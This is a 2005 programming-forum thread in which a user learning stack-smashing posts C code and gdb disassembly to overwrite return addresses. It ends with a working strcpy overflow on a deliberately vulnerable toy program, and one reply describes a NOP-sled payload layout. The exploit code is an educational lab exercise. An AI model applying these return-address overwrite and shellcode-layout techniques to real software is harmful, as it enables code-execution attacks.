Problems with GCC code generation

Started by
5 comments, last by Ilici 18 years, 8 months ago
I'm following this tutorial and tried to compile one of the sources they list:

void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
   int *ret;

   ret = buffer1 + 12;
   (*ret) += 8; //change here to insert the address of printf
}

void main() {
  int x;

  x = 0;
  function(1,2,3);
  x = 1;
  printf("%d\n",x);
}
The problem is that, disassembling with gdb in "main", they get this:

0x8000490 <main>:       pushl  %ebp
0x8000491 <main+1>:     movl   %esp,%ebp
0x8000493 <main+3>:     subl   $0x4,%esp
0x8000496 <main+6>:     movl   $0x0,0xfffffffc(%ebp)
0x800049d <main+13>:    pushl  $0x3
0x800049f <main+15>:    pushl  $0x2
0x80004a1 <main+17>:    pushl  $0x1
0x80004a3 <main+19>:    call   0x8000470 <function>
0x80004a8 <main+24>:    addl   $0xc,%esp
0x80004ab <main+27>:    movl   $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>:    movl   0xfffffffc(%ebp),%eax
0x80004b5 <main+37>:    pushl  %eax
0x80004b6 <main+38>:    pushl  $0x80004f8
0x80004bb <main+43>:    call   0x8000378 <printf>
0x80004c0 <main+48>:    addl   $0x8,%esp
0x80004c3 <main+51>:    movl   %ebp,%esp
0x80004c5 <main+53>:    popl   %ebp
0x80004c6 <main+54>:    ret
0x80004c7 <main+55>:    nop
and I get:

0x0804821e <main+0>:    push   %ebp
0x0804821f <main+1>:    mov    %esp,%ebp
0x08048221 <main+3>:    sub    $0x18,%esp
0x08048224 <main+6>:    and    $0xfffffff0,%esp
0x08048227 <main+9>:    mov    $0x0,%eax
0x0804822c <main+14>:   sub    %eax,%esp
0x0804822e <main+16>:   movl   $0x0,0xfffffffc(%ebp)
0x08048235 <main+23>:   movl   $0x3,0x8(%esp)
0x0804823d <main+31>:   movl   $0x2,0x4(%esp)
0x08048245 <main+39>:   movl   $0x1,(%esp)
0x0804824c <main+46>:   call   0x8048204 <function>
0x08048251 <main+51>:   movl   $0x1,0xfffffffc(%ebp)
0x08048258 <main+58>:   mov    0xfffffffc(%ebp),%eax
0x0804825b <main+61>:   mov    %eax,0x4(%esp)
0x0804825f <main+65>:   movl   $0x8095d88,(%esp)
0x08048266 <main+72>:   call   0x8049650 <printf>
0x0804826b <main+77>:   leave
0x0804826c <main+78>:   ret
I do understand that both asm listings are equivalent (they do the same thing), but the difference is obvious: one uses push and pop, the other addresses the stack directly. Is there a gcc option to get the same code? I'm using gcc 3.3.5, running "gcc -o file -ggdb -static file.c".

Also, disassembling "function", I was expecting the stack pointer (the ESP register) to be decremented by 28 bytes (12 for buffer2, 8 for buffer1, 4 for ret, 4 for the saved BP register), but the disassembly shows otherwise:

0x08048204 <function+0>:        push   %ebp
0x08048205 <function+1>:        mov    %esp,%ebp
0x08048207 <function+3>:        sub    $0x38,%esp
0x0804820a <function+6>:        lea    0xffffffe8(%ebp),%eax
0x0804820d <function+9>:        add    $0xc,%eax
0x08048210 <function+12>:       mov    %eax,0xffffffd4(%ebp)
0x08048213 <function+15>:       mov    0xffffffd4(%ebp),%eax
0x08048216 <function+18>:       movl   $0x8049650,(%eax)
0x0804821c <function+24>:       leave
0x0804821d <function+25>:       ret
Am I not getting how the function call stack operations work?
You probably just have a different version of GCC than they had.
Are you sure that this is actually from the code you posted?
0x08048204 <function+0>:        push   %ebp
0x08048205 <function+1>:        mov    %esp,%ebp
0x08048207 <function+3>:        sub    $0x38,%esp
0x0804820a <function+6>:        lea    0xffffffe8(%ebp),%eax
0x0804820d <function+9>:        add    $0xc,%eax
0x08048210 <function+12>:       mov    %eax,0xffffffd4(%ebp)
0x08048213 <function+15>:       mov    0xffffffd4(%ebp),%eax
0x08048216 <function+18>:       movl   $0x8049650,(%eax)
0x0804821c <function+24>:       leave
0x0804821d <function+25>:       ret

This line 'movl $0x8049650,(%eax)' isn't (*ret)+=8 as it should be.

Also worth pointing out is that 'ret = buffer1 + 12' isn't actually valid C as you aren't allowed to access arrays out of bounds. Of course most C compilers accept that kind of code.

And nmi below is probably right.
I think you ran into alignment trouble. This may depend on how gcc was configured, which version of gcc is used and on which system it is used.
GCC tries to preserve stack alignment where possible, since on some systems (like the Pentium) unaligned access makes program execution slower, and on others (like RISC architectures) it may even cause the processor to throw an exception or access the wrong memory address.

Since gcc supports MMX and SSE instructions, and SSE uses 16-byte memory operands, the stack has an alignment of 16 bytes. You can see that in "function", where 0x38 + 4 (for ebp) + 4 (for ret) is a multiple of 16.

So you may either want to turn off alignment (refer to the gcc command line option reference), or take this into account when doing the address calculation.
Quote:
This line 'movl $0x8049650,(%eax)' isn't (*ret)+=8 as it should be.

You're right, I forgot I changed it to (*ret) = printf;

Quote:
Also worth pointing out is that 'ret = buffer1 + 12' isn't actually valid C as you aren't allowed to access arrays out of bounds. Of course most C compilers accept that kind of code.

That's exactly what I'm counting on :D

Thanks nmi, but I couldn't find any option to turn off alignment. There was "-mno-code-align" but it's only for some other architecture. I guess I'll live with 16 byte alignment.

I changed the code to:
void piggyback()
{
        printf("I'm not your average function!\n");
}

void legit_fn()
{
        char buf[16];
        //16 bytes for buf, 16 bytes for ret, 4 for the previous BP
        unsigned * ret = buf + 16 + 16 + 4;
        *ret = (unsigned)piggyback;
}


legit_fn disassembles to:
0x08048218 <legit_fn+0>:        push   %ebp
0x08048219 <legit_fn+1>:        mov    %esp,%ebp
0x0804821b <legit_fn+3>:        sub    $0x28,%esp
0x0804821e <legit_fn+6>:        lea    0xffffffe8(%ebp),%eax
0x08048221 <legit_fn+9>:        add    $0x24,%eax
0x08048224 <legit_fn+12>:       mov    %eax,0xffffffe4(%ebp)
0x08048227 <legit_fn+15>:       mov    0xffffffe4(%ebp),%eax
0x0804822a <legit_fn+18>:       movl   $0x8048204,(%eax)
0x08048230 <legit_fn+24>:       leave
0x08048231 <legit_fn+25>:       ret

To me this seems like it should work, but it doesn't. Any ideas?
You can try this simple example:
#include <stdio.h>

// to make things easier
typedef void (*func_t)();

void piggyback()
{
        printf("I'm not your average function!\n");
}

void legit_fn(int param)
{
	// calculate position of return address
	// stack should look like this:
	//    param
	//    ret
	//    old ebp
	func_t* func = (func_t*)( ((char*)&param) - 4);

	// reset function address to piggyback
	*func = piggyback;
}

int main()
{
	legit_fn(42);
	return 0;
}


It should print out the message "I'm not your average function!", then end with an exception.

I changed it to take the address of the parameter param, since the code that calls the function looks like this:
push 42
call legit_fn


So the return address should be stored just 4 bytes below param.

If you want to use a local buffer instead, I recommend compiling the program, then looking at the assembly code to do the address calculation, then change the address in the source and then recheck if the compiler still generates the same code (this should be the case if optimisations are off).
Buffer overflow attacks usually rely on the fact that data of unknown length is copied unchecked onto the stack. An example of such a function is sprintf; the checked one is snprintf. Other unchecked functions are strcat and strcpy.

To make sure that you always hit the return address, why not just overwrite the first 100 values with a new address? Then put your new code after that. This way you do not have to hit the return address exactly; you will get it if it falls within the first 100 pointers you have modified.

To activate the code you just copied onto the stack, you must make sure that the modified return address jumps to this code. Just put nop opcodes after the modified return addresses, enough to make sure that your modified return address hits one of those nops. After the nop opcodes, put your own (position-independent) code. GCC has an option to create such code, just in case you want to write it in C/C++.

So the code passed to the function (e.g. via a string) should look like this:
new_ret
new_ret
...
new_ret
nop
...
nop
your_code
That's a nice way to do it. I managed to get this to work:

typedef void (*func_t) ();

void piggyback()
{
        printf("I'm not your average function!\n");
}

void legit_fn(int param)
{
        char test[8];
        func_t* ret;
        //4 bytes for the previous EBP, 8 for "test"
        ret = (func_t*) ( ((char*)&test) + 4 + 8 );
        *ret = piggyback;
}


However, if I use 16 or more bytes for the buffer, it doesn't work anymore.

I now made this:
#include <stdio.h>
#include <string.h>

typedef void (*func_t) ();

union
{
        func_t* func;
        char data[4];
} container;

void piggyback()
{
        printf("W00t!\n");
}

void exploitable(char* param)
{
        char somebuffer[32];
        strcpy(somebuffer, param);
}

int main()
{
        char smash[128];
        container.func = piggyback;
        int i;
        // the array subscripts were eaten by the forum markup; [i] and [i % 4] are assumed
        for (i = 0; i < 64; i++) smash[i] = container.data[i % 4];
        exploitable(smash);
        return 0;
}

which prints "W00t" 5 times actually :D. I now have to change it to execute code from the "smash" buffer.

[Edited by - Ilici on August 11, 2005 4:11:09 PM]

This topic is closed to new replies.
